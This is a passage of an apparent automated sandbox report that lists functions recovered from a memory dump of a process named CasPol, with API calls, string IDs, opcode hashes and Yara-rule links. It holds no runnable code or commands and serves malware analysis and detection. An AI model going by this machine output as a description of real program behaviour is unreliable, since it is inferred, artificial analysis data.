                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2754987064-0
                                                                                                                                                                                    • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                                    • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                                                                    Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2754987064-0
                                                                                                                                                                                    • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                                    • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                                    • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                                                                                    Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00402FD7
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                                                                                    • strlen.MSVCRT ref: 00403006
                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2754987064-0
                                                                                                                                                                                    • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                                                    • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                                                                                                    • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                                                    • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                                                                                                    Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                                                      • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                                                      • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                                                    • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                                                    • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 764393265-0
                                                                                                                                                                                    • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                    • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                                                                                    • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                                                                                    Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Time$System$File$LocalSpecific
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 979780441-0
                                                                                                                                                                                    • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                    • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                                                                                    • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                                                                                    Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                                                                                    • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                                                    • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1386444988-0
                                                                                                                                                                                    • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                    • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                                                                                    • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                    • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                                                                                    Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InvalidateMessageRectSend
                                                                                                                                                                                    • String ID: d=E
                                                                                                                                                                                    • API String ID: 909852535-3703654223
                                                                                                                                                                                    • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                                                                                    • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                                                                                                    • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                                                                                                    Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                                                      • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                                                      • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcschr$memcpywcslen
                                                                                                                                                                                    • String ID: "
                                                                                                                                                                                    • API String ID: 1983396471-123907689
                                                                                                                                                                                    • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                                    • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                                                                                    • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                                                                                    Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                    • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                                                    • String ID: URL
                                                                                                                                                                                    • API String ID: 2108176848-3574463123
                                                                                                                                                                                    • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                    • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                    • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                                                                                                    Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _snwprintfmemcpy
                                                                                                                                                                                    • String ID: %2.2X
                                                                                                                                                                                    • API String ID: 2789212964-323797159
                                                                                                                                                                                    • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                                    • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                                    • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                                                                    Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _snwprintf
                                                                                                                                                                                    • String ID: %%-%d.%ds
                                                                                                                                                                                    • API String ID: 3988819677-2008345750
                                                                                                                                                                                    • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                                                    • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                                                                                    • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                                                    • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                                                                                    Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E770
                                                                                                                                                                                    • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSendmemset
                                                                                                                                                                                    • String ID: F^@
                                                                                                                                                                                    • API String ID: 568519121-3652327722
                                                                                                                                                                                    • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                                    • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                                                                                    • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                                    • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                                                                                    Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PlacementWindowmemset
                                                                                                                                                                                    • String ID: WinPos
                                                                                                                                                                                    • API String ID: 4036792311-2823255486
                                                                                                                                                                                    • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                                                    • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                                                    • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                                                                                    Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??3@DeleteObject
                                                                                                                                                                                    • String ID: r!A
                                                                                                                                                                                    • API String ID: 1103273653-628097481
                                                                                                                                                                                    • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                    • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                                                    Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                    • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                                                                                    • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                                                    • String ID: _lng.ini
                                                                                                                                                                                    • API String ID: 383090722-1948609170
                                                                                                                                                                                    • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                                                    • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                                                                                                    • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                                                    • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                                                                                                    Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                                                                                                    • memset.MSVCRT ref: 0042BAAE
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 438689982-0
                                                                                                                                                                                    • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                                                    • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                                                                                    • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                                                                                    Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@$memset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1860491036-0
                                                                                                                                                                                    • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                                    • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                                                                                    • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                                                                                    Function 0040A8D0 Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                    • free.MSVCRT ref: 0040A908
                                                                                                                                                                                    • free.MSVCRT ref: 0040A92B
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 726966127-0
                                                                                                                                                                                    • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                                                                                                                    • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                                                                                    • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                                                                                    Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                                                    • free.MSVCRT ref: 0040B201
                                                                                                                                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                    • free.MSVCRT ref: 0040B224
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 726966127-0
                                                                                                                                                                                    • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                                                                                                    • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
